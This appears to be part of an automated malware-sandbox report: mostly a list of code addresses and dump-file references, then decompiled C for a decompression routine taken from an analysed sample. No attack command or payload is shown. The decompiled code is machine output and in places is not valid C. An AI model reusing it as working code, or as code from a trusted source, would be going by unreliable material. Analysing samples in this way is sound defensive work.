                                                  0x0040628f
                                                  0x00406292
                                                  0x00406295
                                                  0x00406295
                                                  0x00406295
                                                  0x00406298
                                                  0x0040629c
                                                  0x00000000
                                                  0x00000000
                                                  0x0040629e
                                                  0x004062a4
                                                  0x004062ce
                                                  0x004062d4
                                                  0x004062db
                                                  0x00000000
                                                  0x004062db
                                                  0x004062aa
                                                  0x004062ad
                                                  0x004062b2
                                                  0x004062b2
                                                  0x004062bd
                                                  0x004062c5
                                                  0x004062c8
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040630d
                                                  0x00406313
                                                  0x00406316
                                                  0x00406323
                                                  0x0040632b
                                                  0x0040699f
                                                  0x0040699f
                                                  0x00000000
                                                  0x00000000
                                                  0x004062e2
                                                  0x004062e2
                                                  0x004062e6
                                                  0x00406b31
                                                  0x00000000
                                                  0x00406b31
                                                  0x004062f2
                                                  0x004062fd
                                                  0x004062fd
                                                  0x004062fd
                                                  0x00406300
                                                  0x00406303
                                                  0x00406306
                                                  0x0040630b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004069a2
                                                  0x004069a2
                                                  0x004069a8
                                                  0x004069ae
                                                  0x004069b4
                                                  0x004069ce
                                                  0x004069d1
                                                  0x004069d7
                                                  0x004069e2
                                                  0x004069e4
                                                  0x004069b6
                                                  0x004069b6
                                                  0x004069c5
                                                  0x004069c9
                                                  0x004069c9
                                                  0x004069ee
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406333
                                                  0x00406335
                                                  0x00406338
                                                  0x004063a9
                                                  0x004063ac
                                                  0x004063af
                                                  0x004063b6
                                                  0x004063c0
                                                  0x0040699f
                                                  0x0040699f
                                                  0x0040699f
                                                  0x00000000
                                                  0x0040699f
                                                  0x0040699f
                                                  0x0040633a
                                                  0x0040633e
                                                  0x00406341
                                                  0x00406343
                                                  0x00406346
                                                  0x00406349
                                                  0x0040634b
                                                  0x0040634e
                                                  0x00406350
                                                  0x00406355
                                                  0x00406358
                                                  0x0040635b
                                                  0x0040635f
                                                  0x00406366
                                                  0x00406369
                                                  0x00406370
                                                  0x00406374
                                                  0x0040637c
                                                  0x0040637c
                                                  0x0040637c
                                                  0x00406376
                                                  0x00406376
                                                  0x00406376
                                                  0x0040636b
                                                  0x0040636b
                                                  0x0040636b
                                                  0x00406380
                                                  0x00406383
                                                  0x004063a1
                                                  0x004063a3
                                                  0x00000000
                                                  0x00406385
                                                  0x00406385
                                                  0x00406388
                                                  0x0040638b
                                                  0x0040638e
                                                  0x00406390
                                                  0x00406390
                                                  0x00406390
                                                  0x00406393
                                                  0x00406396
                                                  0x00406398
                                                  0x00406399
                                                  0x0040639c
                                                  0x00000000
                                                  0x0040639c
                                                  0x00000000
                                                  0x004065d2
                                                  0x004065d6
                                                  0x004065f4
                                                  0x004065f7
                                                  0x004065fe
                                                  0x00406601
                                                  0x00406604
                                                  0x00406607
                                                  0x0040660a
                                                  0x0040660d
                                                  0x0040660f
                                                  0x00406616
                                                  0x00406617
                                                  0x00406619
                                                  0x0040661c
                                                  0x0040661f
                                                  0x00406622
                                                  0x00406622
                                                  0x00406627
                                                  0x00000000
                                                  0x00406627
                                                  0x004065d8
                                                  0x004065db
                                                  0x004065de
                                                  0x004065e8
                                                  0x0040699f
                                                  0x0040699f
                                                  0x0040699f
                                                  0x00000000
                                                  0x0040699f
                                                  0x00000000
                                                  0x0040663c
                                                  0x00406640
                                                  0x00406663
                                                  0x00406666
                                                  0x00406669
                                                  0x00406673
                                                  0x00406642
                                                  0x00406642
                                                  0x00406645
                                                  0x00406648
                                                  0x0040664b
                                                  0x00406658
                                                  0x0040665b
                                                  0x0040665b
                                                  0x0040699f
                                                  0x0040699f
                                                  0x0040699f
                                                  0x00000000
                                                  0x0040699f
                                                  0x00000000
                                                  0x0040667f
                                                  0x00406683
                                                  0x00000000
                                                  0x00000000
                                                  0x00406689
                                                  0x0040668d
                                                  0x00000000
                                                  0x00000000
                                                  0x00406693
                                                  0x00406695
                                                  0x00406699
                                                  0x00406699
                                                  0x0040669c
                                                  0x004066a0
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406717
                                                  0x0040671b
                                                  0x00406722
                                                  0x00406725
                                                  0x00406728
                                                  0x0040671d
                                                  0x0040671d
                                                  0x0040671d
                                                  0x0040672b
                                                  0x0040672e
                                                  0x00000000
                                                  0x00000000
                                                  0x004067d7
                                                  0x004067d7
                                                  0x004067db
                                                  0x00406b79
                                                  0x00000000
                                                  0x00406b79
                                                  0x004067e1
                                                  0x004067e4
                                                  0x004067e7
                                                  0x004067eb
                                                  0x004067ee
                                                  0x004067f4
                                                  0x004067f6
                                                  0x004067f6
                                                  0x004067f6
                                                  0x004067f9
                                                  0x004067fc
                                                  0x00000000
                                                  0x00000000
                                                  0x004063cc
                                                  0x004063cc
                                                  0x004063d0
                                                  0x00406b3d
                                                  0x00000000
                                                  0x00406b3d
                                                  0x004063d6
                                                  0x004063d9
                                                  0x004063dc
                                                  0x004063e0
                                                  0x004063e3
                                                  0x004063e9
                                                  0x004063eb
                                                  0x004063eb
                                                  0x004063eb
                                                  0x004063ee
                                                  0x004063f1
                                                  0x004063f1
                                                  0x004063f4
                                                  0x004063f7
                                                  0x00000000
                                                  0x00000000
                                                  0x004063fd
                                                  0x00406403
                                                  0x00000000
                                                  0x00000000
                                                  0x00406409
                                                  0x00406409
                                                  0x0040640d
                                                  0x00406410
                                                  0x00406413
                                                  0x00406416
                                                  0x00406419
                                                  0x0040641a
                                                  0x0040641d
                                                  0x0040641f
                                                  0x00406425
                                                  0x00406428
                                                  0x0040642b
                                                  0x0040642e
                                                  0x00406431
                                                  0x00406434
                                                  0x00406437
                                                  0x00406453
                                                  0x00406456
                                                  0x00406459
                                                  0x0040645c
                                                  0x00406463
                                                  0x00406467
                                                  0x00406469
                                                  0x0040646d
                                                  0x00406439
                                                  0x00406439
                                                  0x0040643d
                                                  0x00406445
                                                  0x0040644a
                                                  0x0040644c
                                                  0x0040644e
                                                  0x0040644e
                                                  0x00406470
                                                  0x00406477
                                                  0x0040647a
                                                  0x00000000
                                                  0x00406480
                                                  0x00000000
                                                  0x00406480
                                                  0x00000000
                                                  0x00406485
                                                  0x00406485
                                                  0x00406489
                                                  0x00406b49
                                                  0x00000000
                                                  0x00406b49
                                                  0x0040648f
                                                  0x00406492
                                                  0x00406495
                                                  0x00406499
                                                  0x0040649c
                                                  0x004064a2
                                                  0x004064a4
                                                  0x004064a4
                                                  0x004064a4
                                                  0x004064a7
                                                  0x004064aa
                                                  0x004064aa
                                                  0x004064aa
                                                  0x004064b0
                                                  0x00000000
                                                  0x00000000
                                                  0x004064b2
                                                  0x004064b5
                                                  0x004064b8
                                                  0x004064bb
                                                  0x004064be
                                                  0x004064c1
                                                  0x004064c4
                                                  0x004064c7
                                                  0x004064ca
                                                  0x004064cd
                                                  0x004064d0
                                                  0x004064e8
                                                  0x004064eb
                                                  0x004064ee
                                                  0x004064f1
                                                  0x004064f1
                                                  0x004064f4
                                                  0x004064f8
                                                  0x004064fa
                                                  0x004064d2
                                                  0x004064d2
                                                  0x004064da
                                                  0x004064df
                                                  0x004064e1
                                                  0x004064e3
                                                  0x004064e3
                                                  0x004064fd
                                                  0x00406504
                                                  0x00406507
                                                  0x00000000
                                                  0x00406509
                                                  0x00000000
                                                  0x00406509
                                                  0x00406507
                                                  0x0040650e
                                                  0x0040650e
                                                  0x0040650e
                                                  0x0040650e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406549
                                                  0x00406549
                                                  0x0040654d
                                                  0x00406b55
                                                  0x00000000
                                                  0x00406b55
                                                  0x00406553
                                                  0x00406556
                                                  0x00406559
                                                  0x0040655d
                                                  0x00406560
                                                  0x00406566
                                                  0x00406568
                                                  0x00406568
                                                  0x00406568
                                                  0x0040656b
                                                  0x0040656e
                                                  0x0040656e
                                                  0x00406574
                                                  0x00406512
                                                  0x00406512
                                                  0x00406515
                                                  0x00000000
                                                  0x00406515
                                                  0x00406576
                                                  0x00406576
                                                  0x00406579
                                                  0x0040657c
                                                  0x0040657f
                                                  0x00406582
                                                  0x00406585
                                                  0x00406588
                                                  0x0040658b
                                                  0x0040658e
                                                  0x00406591
                                                  0x00406594
                                                  0x004065ac
                                                  0x004065af
                                                  0x004065b2
                                                  0x004065b5
                                                  0x004065b5
                                                  0x004065b8
                                                  0x004065bc
                                                  0x004065be
                                                  0x00406596
                                                  0x00406596
                                                  0x0040659e
                                                  0x004065a3
                                                  0x004065a5
                                                  0x004065a7
                                                  0x004065a7
                                                  0x004065c1
                                                  0x004065c8
                                                  0x004065cb
                                                  0x00000000
                                                  0x004065cd
                                                  0x00000000
                                                  0x004065cd
                                                  0x00000000
                                                  0x0040685a
                                                  0x0040685a
                                                  0x0040685e
                                                  0x00406b85
                                                  0x00000000
                                                  0x00406b85
                                                  0x00406864
                                                  0x00406867
                                                  0x0040686a
                                                  0x0040686e
                                                  0x00406871
                                                  0x00406877
                                                  0x00406879
                                                  0x00406879
                                                  0x00406879
                                                  0x0040687c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406969
                                                  0x0040696d
                                                  0x0040698f
                                                  0x00406992
                                                  0x0040699c
                                                  0x0040699f
                                                  0x0040699f
                                                  0x0040699f
                                                  0x00000000
                                                  0x0040699f
                                                  0x0040699f
                                                  0x0040696f
                                                  0x00406972
                                                  0x00406976
                                                  0x00406979
                                                  0x00406979
                                                  0x0040697c
                                                  0x00000000
                                                  0x00000000
                                                  0x00406a26
                                                  0x00406a2a
                                                  0x00406a48
                                                  0x00406a48
                                                  0x00406a48
                                                  0x00406a4f
                                                  0x00406a56
                                                  0x00406a5d
                                                  0x00406a5d
                                                  0x00000000
                                                  0x00406a5d
                                                  0x00406a2c
                                                  0x00406a2f
                                                  0x00406a32
                                                  0x00406a35
                                                  0x00406a3c
                                                  0x00406980
                                                  0x00406980
                                                  0x00406983
                                                  0x00000000
                                                  0x00000000
                                                  0x00406b17
                                                  0x00406b1a
                                                  0x00406a1b
                                                  0x00000000
                                                  0x00000000
                                                  0x00406751
                                                  0x00406753
                                                  0x0040675a
                                                  0x0040675b
                                                  0x0040675d
                                                  0x00406760
                                                  0x00000000
                                                  0x00000000
                                                  0x00406768
                                                  0x0040676b
                                                  0x0040676e
                                                  0x00406770
                                                  0x00406772
                                                  0x00406772
                                                  0x00406773
                                                  0x00406776
                                                  0x0040677d
                                                  0x00406780
                                                  0x0040678e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406a64
                                                  0x00406a64
                                                  0x00406a67
                                                  0x00406a6e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406a73
                                                  0x00406a73
                                                  0x00406a77
                                                  0x00406baf
                                                  0x00000000
                                                  0x00406baf
                                                  0x00406a7d
                                                  0x00406a80
                                                  0x00406a83
                                                  0x00406a87
                                                  0x00406a8a
                                                  0x00406a90
                                                  0x00406a92
                                                  0x00406a92
                                                  0x00406a92
                                                  0x00406a95
                                                  0x00406a98
                                                  0x00406a98
                                                  0x00406a98
                                                  0x00406a98
                                                  0x00406a9b
                                                  0x00406a9b
                                                  0x00406a9f
                                                  0x00406aff
                                                  0x00406b02
                                                  0x00406b07
                                                  0x00406b08
                                                  0x00406b0a
                                                  0x00406b0c
                                                  0x00406b0f
                                                  0x00406a1b
                                                  0x00406a1b
                                                  0x00000000
                                                  0x00406a21
                                                  0x00406a1b
                                                  0x00406aa1
                                                  0x00406aa7
                                                  0x00406aaa
                                                  0x00406aad
                                                  0x00406ab0
                                                  0x00406ab3
                                                  0x00406ab6
                                                  0x00406ab9
                                                  0x00406abc
                                                  0x00406abf
                                                  0x00406ac2
                                                  0x00406adb
                                                  0x00406ade
                                                  0x00406ae1
                                                  0x00406ae4
                                                  0x00406ae8
                                                  0x00406aea
                                                  0x00406aea
                                                  0x00406aeb
                                                  0x00406aee
                                                  0x00406ac4
                                                  0x00406ac4
                                                  0x00406acc
                                                  0x00406ad1
                                                  0x00406ad3
                                                  0x00406ad6
                                                  0x00406ad6
                                                  0x00406af1
                                                  0x00406af8
                                                  0x00000000
                                                  0x00406afa
                                                  0x00000000
                                                  0x00406afa
                                                  0x00000000
                                                  0x00406796
                                                  0x00406799
                                                  0x004067cf
                                                  0x004068ff
                                                  0x004068ff
                                                  0x004068ff
                                                  0x004068ff
                                                  0x00406902
                                                  0x00406902
                                                  0x00406905
                                                  0x00406907
                                                  0x00406b91
                                                  0x00000000
                                                  0x00406b91
                                                  0x0040690d
                                                  0x00406910
                                                  0x00000000
                                                  0x00000000
                                                  0x00406916
                                                  0x0040691a
                                                  0x0040691d
                                                  0x0040691d
                                                  0x0040691d
                                                  0x00000000
                                                  0x0040691d
                                                  0x0040679b
                                                  0x0040679d
                                                  0x0040679f
                                                  0x004067a1
                                                  0x004067a4
                                                  0x004067a5
                                                  0x004067a7
                                                  0x004067a9
                                                  0x004067ac
                                                  0x004067af
                                                  0x004067c5
                                                  0x004067ca
                                                  0x00406802
                                                  0x00406802
                                                  0x00406806
                                                  0x00406832
                                                  0x00406834
                                                  0x0040683b
                                                  0x0040683e
                                                  0x00406841
                                                  0x00406841
                                                  0x00406846
                                                  0x00406846
                                                  0x00406848
                                                  0x0040684b
                                                  0x00406852
                                                  0x00406855
                                                  0x00406882
                                                  0x00406882
                                                  0x00406885
                                                  0x00406888
                                                  0x004068fc
                                                  0x004068fc
                                                  0x004068fc
                                                  0x00000000
                                                  0x004068fc
                                                  0x0040688a
                                                  0x00406890
                                                  0x00406893
                                                  0x00406896
                                                  0x00406899
                                                  0x0040689c
                                                  0x0040689f
                                                  0x004068a2
                                                  0x004068a5
                                                  0x004068a8
                                                  0x004068ab
                                                  0x004068c4
                                                  0x004068c6
                                                  0x004068c9
                                                  0x004068ca
                                                  0x004068cd
                                                  0x004068cf
                                                  0x004068d2
                                                  0x004068d4
                                                  0x004068d6
                                                  0x004068d9
                                                  0x004068db
                                                  0x004068de
                                                  0x004068e2
                                                  0x004068e4
                                                  0x004068e4
                                                  0x004068e5
                                                  0x004068e8
                                                  0x004068eb
                                                  0x004068ad
                                                  0x004068ad
                                                  0x004068b5
                                                  0x004068ba
                                                  0x004068bc
                                                  0x004068bf
                                                  0x004068bf
                                                  0x004068ee
                                                  0x004068f5
                                                  0x0040687f
                                                  0x0040687f
                                                  0x0040687f
                                                  0x0040687f
                                                  0x00000000
                                                  0x004068f7
                                                  0x00000000
                                                  0x004068f7
                                                  0x004068f5
                                                  0x00406808
                                                  0x0040680b
                                                  0x0040680d
                                                  0x00406810
                                                  0x00406813
                                                  0x00406816
                                                  0x00406818
                                                  0x0040681b
                                                  0x0040681e
                                                  0x0040681e
                                                  0x00406821
                                                  0x00406821
                                                  0x00406824
                                                  0x0040682b
                                                  0x004067ff
                                                  0x004067ff
                                                  0x004067ff
                                                  0x004067ff
                                                  0x00000000
                                                  0x0040682d
                                                  0x00000000
                                                  0x0040682d
                                                  0x0040682b
                                                  0x004067b1
                                                  0x004067b4
                                                  0x004067b6
                                                  0x004067b9
                                                  0x00000000
                                                  0x00000000
                                                  0x00406518
                                                  0x00406518
                                                  0x0040651c
                                                  0x00406b61
                                                  0x00000000
                                                  0x00406b61
                                                  0x00406522
                                                  0x00406525
                                                  0x00406528
                                                  0x0040652b
                                                  0x0040652e
                                                  0x00406531
                                                  0x00406534
                                                  0x00406536
                                                  0x00406539
                                                  0x0040653c
                                                  0x0040653f
                                                  0x00406541
                                                  0x00406541
                                                  0x00406541
                                                  0x00000000
                                                  0x00000000
                                                  0x004066a3
                                                  0x004066a3
                                                  0x004066a7
                                                  0x00406b6d
                                                  0x00000000
                                                  0x00406b6d
                                                  0x004066ad
                                                  0x004066b0
                                                  0x004066b3
                                                  0x004066b6
                                                  0x004066b8
                                                  0x004066b8
                                                  0x004066b8
                                                  0x004066bb
                                                  0x004066be
                                                  0x004066c1
                                                  0x004066c4
                                                  0x004066c7
                                                  0x004066ca
                                                  0x004066cb
                                                  0x004066cd
                                                  0x004066cd
                                                  0x004066cd
                                                  0x004066d0
                                                  0x004066d3
                                                  0x004066d6
                                                  0x004066d9
                                                  0x004066d9
                                                  0x004066d9
                                                  0x004066dc
                                                  0x004066de
                                                  0x004066de
                                                  0x00000000
                                                  0x00000000
                                                  0x00406920
                                                  0x00406920
                                                  0x00406920
                                                  0x00406924
                                                  0x00000000
                                                  0x00000000
                                                  0x0040692a
                                                  0x0040692d
                                                  0x00406930
                                                  0x00406933
                                                  0x00406935
                                                  0x00406935
                                                  0x00406935
                                                  0x00406938
                                                  0x0040693b
                                                  0x0040693e
                                                  0x00406941
                                                  0x00406944
                                                  0x00406947
                                                  0x00406948
                                                  0x0040694a
                                                  0x0040694a
                                                  0x0040694a
                                                  0x0040694d
                                                  0x00406950
                                                  0x00406953
                                                  0x00406956
                                                  0x00406959
                                                  0x0040695d
                                                  0x0040695f
                                                  0x00406962
                                                  0x00000000
                                                  0x00406964
                                                  0x004066e1
                                                  0x004066e1
                                                  0x00000000
                                                  0x004066e1
                                                  0x00406962
                                                  0x00406b97
                                                  0x00000000
                                                  0x00000000
                                                  0x004061c6
                                                  0x00406bce
                                                  0x00406bce
                                                  0x00000000
                                                  0x00406bce
                                                  0x00406a1b
                                                  0x004069a2
                                                  0x0040699f
                                                  0x00000000
                                                  0x004066f4

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 804fba803cbd16a140b159ae7d26de6fa0620b5d9a2f4af6b8021cca2140f9f9
                                                  • Instruction ID: 7be6eb69932b41c0b27de07e5fb880b338722213318b425ba270fb710fdbb197
                                                  • Opcode Fuzzy Hash: 804fba803cbd16a140b159ae7d26de6fa0620b5d9a2f4af6b8021cca2140f9f9
                                                  • Instruction Fuzzy Hash: FE714671E00228CBDF28CF98C8447ADBBB1FB44305F15816ED856BB281C778AA96DF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040663C Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 98%
                                                  			E0040663C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406BD6))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
